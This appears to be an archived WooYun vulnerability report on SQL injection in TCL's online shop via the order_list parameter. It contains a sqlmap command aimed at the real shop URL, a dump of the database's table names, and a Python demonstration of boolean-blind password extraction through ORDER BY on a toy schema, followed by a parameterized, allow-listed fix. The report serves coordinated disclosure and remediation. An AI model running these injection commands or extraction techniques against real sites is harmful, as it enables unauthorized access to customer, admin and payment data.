WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-09-30: Details sent to the vendor, awaiting the vendor's response
2014-09-30: Vendor confirmed; details disclosed to the vendor only
2014-10-10: Details disclosed to core white hats and experts in the relevant field
2014-10-20: Details disclosed to regular white hats
2014-10-30: Details disclosed to intern white hats
2014-11-14: Details disclosed to the public
Dangerous characters in user input are not properly sanitized before the input reaches a SQL query.

Vulnerable parameter: order_list. In the sqlmap command below the `*` in the URL marks the injection point, so sqlmap tests only that position rather than every parameter:

    python sqlmap.py -u "http://shop.tcl.com/mall/goods/index.html?attrs_216=541&cat_id=20&order_list=*&porder=stb" --dbs
The listing below is sqlmap's enumeration of the tables in the shoptcl database (the output format of `-D shoptcl --tables`; `--dbs` alone only lists database names). The presence of sys_admin, sys_session, ro_user, ec_payment_cfg and the ec_fenxiao_* tables is what makes this more than a read of the product catalogue:

    Database: shoptcl
    [152 tables]
    +------------------------------+
    | base_generate_number         |
    | c_goods_spec_index_0916      |
    | ec_brand                     |
    | ec_brand_category            |
    | ec_bulk_purchase             |
    | ec_cart                      |
    | ec_category_spec             |
    | ec_category_spec_value       |
    | ec_comment                   |
    | ec_comment_image             |
    | ec_consultation              |
    | ec_coupons                   |
    | ec_coupons_goods             |
    | ec_coupons_use_detail        |
    | ec_custom_cat_menu           |
    | ec_evaluate                  |
    | ec_evaluate_detail           |
    | ec_fenxiao_account           |
    | ec_fenxiao_copywritten       |
    | ec_fenxiao_fans_contact      |
    | ec_fenxiao_goods             |
    | ec_fenxiao_income_detail     |
    | ec_fenxiao_income_use_detail |
    | ec_fenxiao_level             |
    | ec_fenxiao_order             |
    | ec_fenxiao_order_item        |
    | ec_fenxiao_product           |
    | ec_fenxiao_share             |
    | ec_fenxiao_share_stat        |
    | ec_fenxiao_shop_rela         |
    | ec_fenxiao_user              |
    | ec_fenxiao_user_audit        |
    | ec_fenxiao_user_cust         |
    | ec_fenxiao_withdraw          |
    | ec_freight_tpl               |
    | ec_freight_tpl_area          |
    | ec_freight_tpl_detail        |
    | ec_goods                     |
    | ec_goods_collocation         |
    | ec_goods_custom_cat          |
    | ec_goods_gift                |
    | ec_goods_image               |
    | ec_goods_mapping             |
    | ec_goods_pkg                 |
    | ec_goods_pkg_detail          |
    | ec_goods_pkg_image           |
    | ec_goods_relation            |
    | ec_goods_set                 |
    | ec_goods_set_detail          |
    | ec_goods_spec_index          |
    | ec_group_purchase_item       |
    | ec_inventory_occupy_detail   |
    | ec_logistics_info            |
    | ec_logistics_tracking        |
    | ec_order                     |
    | ec_order_discount            |
    | ec_order_item                |
    | ec_order_log                 |
    | ec_order_msg_log             |
    | ec_order_refund              |
    | ec_order_refund_log          |
    | ec_payment                   |
    | ec_payment_cfg               |
    | ec_product                   |
    | ec_product_sku_rela          |
    | ec_product_sku_rela_0918     |
    | ec_promotion                 |
    | ec_promotion_discount        |
    | ec_promotion_integral        |
    | ec_promotion_present         |
    | ec_promotion_reduce          |
    | ec_promotion_seckill         |
    | ec_push_msg                  |
    | ec_search_keword             |
    | ec_search_keyword            |
    | ec_search_log                |
    | ec_search_rela_keword        |
    | ec_search_weight_adjust      |
    | ec_search_weight_rule        |
    | ec_service_policy            |
    | ec_shop                      |
    | ec_shop_category             |
    | ec_shop_sub_account          |
    | ec_spec                      |
    | ec_spec_value                |
    | ec_store                     |
    | ec_store_cover               |
    | ec_store_inventory           |
    | ec_store_sku                 |
    | ec_transfer_account          |
    | ec_user_favorite             |
    | ec_user_history              |
    | esb_app_info                 |
    | esb_app_permission           |
    | esb_msg_data                 |
    | esb_msg_que                  |
    | esb_service                  |
    | esb_service_api              |
    | ro_resource                  |
    | ro_role                      |
    | ro_role_priv                 |
    | ro_seller_log                |
    | ro_seller_menu               |
    | ro_subacct_role              |
    | ro_user                      |
    | ro_user_address              |
    | sys_access_log               |
    | sys_admin                    |
    | sys_admin_log                |
    | sys_admin_role               |
    | sys_admin_role_priv          |
    | sys_article                  |
    | sys_caches                   |
    | sys_category                 |
    | sys_custom_category          |
    | sys_dict                     |
    | sys_dict_type                |
    | sys_district                 |
    | sys_email_verify_code        |
    | sys_feedback                 |
    | sys_file                     |
    | sys_file_server              |
    | sys_file_type                |
    | sys_image_thumbrule          |
    | sys_meta                     |
    | sys_object_file              |
    | sys_point_rule               |
    | sys_position                 |
    | sys_position_data            |
    | sys_position_keyword         |
    | sys_position_space           |
    | sys_poster                   |
    | sys_poster_click             |
    | sys_poster_space             |
    | sys_reg_invite               |
    | sys_resource                 |
    | sys_role                     |
    | sys_session                  |
    | sys_setting                  |
    | sys_sms_sendlist             |
    | sys_sms_templates            |
    | sys_sms_verify_code          |
    | sys_template                 |
    | sys_template_type            |
    | sys_user_point               |
    | sys_user_point_detail        |
    | sys_user_point_use_detail    |
    | sys_user_rank                |
    | sys_widget_callset           |
    | sys_widget_template          |
    | sys_widget_type              |
    | tmp_0916                     |
    +------------------------------+
Fix: use parameterized SQL statements. One caveat for a parameter such as order_list: if its value names a sort column or sort expression rather than a data value, a bind parameter cannot carry it (database drivers bind values, not identifiers), so the value has to be matched against an allow-list of permitted column names and anything else rejected.
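The following is an added example written for this page; it is not code from the report or from TCL's shop. It assumes that order_list is interpolated into an ORDER BY clause (the report only says the parameter is injectable) and uses a constructed SQLite schema whose table names echo the dump above but whose columns and rows are invented. It shows why an ORDER BY position is enough for a boolean-based blind oracle of the kind sqlmap drives through the `*` marker, and then the hardened query in which the filter value is bound and the sort key is allow-listed, since the sort column itself cannot be parameterized.

```python
import sqlite3
import string

# Constructed toy schema for the demonstration. Only the table names echo the
# dumped shoptcl list; the columns and rows are assumptions, not TCL's schema.
SCHEMA = """
CREATE TABLE ec_goods (goods_id INTEGER PRIMARY KEY, goods_name TEXT,
                       price REAL, cat_id INTEGER);
CREATE TABLE sys_admin (admin_id INTEGER PRIMARY KEY, username TEXT,
                        password TEXT);
"""
GOODS = [(1, "zeta", 10.0, 20), (2, "alpha", 30.0, 20), (3, "mid", 20.0, 20)]
ADMINS = [(1, "admin", "secret")]  # constructed, deliberately weak sample data


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO ec_goods VALUES (?, ?, ?, ?)", GOODS)
    conn.executemany("INSERT INTO sys_admin VALUES (?, ?, ?)", ADMINS)
    return conn


def list_goods_vulnerable(conn, cat_id, order_list):
    """Vulnerable pattern (assumed): cat_id is cast to int, but order_list is
    pasted verbatim into ORDER BY, so any SQL expression is accepted there."""
    sql = (f"SELECT goods_id, goods_name, price FROM ec_goods "
           f"WHERE cat_id = {int(cat_id)} ORDER BY {order_list}")
    return conn.execute(sql).fetchall()


def extract_secret(conn, length, cat_id=20):
    """Boolean-based blind extraction through ORDER BY: a CASE expression
    sorts by price when the character guess is right and by name otherwise,
    so comparing the row order with a known baseline leaks one character per
    probe. This is the oracle class sqlmap builds when `*` sits in a sort key."""
    baseline = list_goods_vulnerable(conn, cat_id, "price")
    found = ""
    for pos in range(1, length + 1):
        for guess in string.ascii_lowercase:
            probe = (f"(CASE WHEN (SELECT substr(password,{pos},1) "
                     f"FROM sys_admin LIMIT 1)='{guess}' "
                     f"THEN price ELSE goods_name END)")
            if list_goods_vulnerable(conn, cat_id, probe) == baseline:
                found += guess
                break
        else:
            break  # character outside the tested alphabet; stop here
    return found


# Hardened version. The filter value is bound as a parameter; the sort column
# and direction are identifiers, which cannot be bound, so they are mapped
# through an allow-list and any other value is rejected before query build.
SORT_COLUMNS = {"price": "price", "name": "goods_name", "id": "goods_id"}


def list_goods_hardened(conn, cat_id, order_list, porder="asc"):
    column = SORT_COLUMNS.get(order_list)
    if column is None:
        raise ValueError(f"unsupported sort key: {order_list!r}")
    direction = "DESC" if porder == "desc" else "ASC"  # porder is assumed to be the direction
    sql = (f"SELECT goods_id, goods_name, price FROM ec_goods "
           f"WHERE cat_id = ? ORDER BY {column} {direction}")
    return conn.execute(sql, (int(cat_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY oracle:", extract_secret(db, 6))
    print("hardened, valid key:", list_goods_hardened(db, "20", "price"))
    try:
        list_goods_hardened(db, "20", "price,(SELECT 1)")
    except ValueError as exc:
        print("hardened, rejected:", exc)
```

The oracle needs nothing but two distinguishable orderings, which is why escaping quotes does not help here: the probe contains no string delimiter that the application could strip, and a numeric `order_list` such as `1` versus `2` would serve equally well. The allow-list in `list_goods_hardened` is the only construction that closes the position, and the same treatment applies to porder.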
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-09-30 11:42
Vendor reply: Thank you for your attention; this has been forwarded to the relevant unit for handling.
None